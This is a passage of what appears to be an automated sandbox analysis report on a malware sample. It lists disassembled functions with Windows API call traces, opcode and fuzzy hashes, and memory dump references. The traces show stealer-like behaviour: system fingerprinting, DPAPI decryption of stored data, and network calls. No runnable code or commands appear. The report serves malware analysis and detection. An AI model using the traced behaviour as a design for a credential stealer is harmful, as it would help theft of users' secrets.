                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                                              • Opcode ID: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                              • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd629de8ee10eada1f72c85526e9c289853b14595428188ec74a26340a2c39ec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                                • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,040673D8,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,040863D0,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                                • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                                • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04087058,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040839E8), ref: 0041438F
                                                                                                                                                                                                                                                • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04087058,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040839E8), ref: 00414396
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                                • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                                • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                                • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 004144C0
                                                                                                                                                                                                                                                • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04086460,00000000,?,0041D758,00000000,?,00000000,00000000,?,04086E98,00000000), ref: 00414542
                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,04086ED8,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04086520,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                                • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04067288,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04086D38,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                                • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,040864A8,00000000,?,0041D774,00000000,?,00000000,00000000,?,040863E8), ref: 0041496D
                                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                                • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,0406C1E0,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                              • String ID: E.A
                                                                                                                                                                                                                                              • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                              • Opcode ID: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                              • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b033d71a75b0a659c9550832104cb48f202312a58c6f872a4bc729aaadf1e74
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,04086388), ref: 0040971B
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                                • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                                              • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                              • Opcode ID: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
                                                                                                                                                                                                                                              • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f4a53806341329f0c8cf58e5e612071402de3d3ed0e05b65ae4abbc920533e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3491751439-0
                                                                                                                                                                                                                                              • Opcode ID: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                              • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 663210355256c1a79006bc930096bf3c730480ad8148fdf9ee136a6da0e86fe2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                              • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,04082BB0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                                              • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                              • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Pi@
                                                                                                                                                                                                                                              • API String ID: 0-1360946908
                                                                                                                                                                                                                                              • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                              • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                              • Opcode ID: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                              • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85c67f99e022b53bf17435a6d7f42a962d884bf02f2d202c56b95b99adfd8f66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,040837D8), ref: 0040EFCE
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,04083938), ref: 0040F06F
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,040837E8), ref: 0040F17E
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                              Memory Dump Source
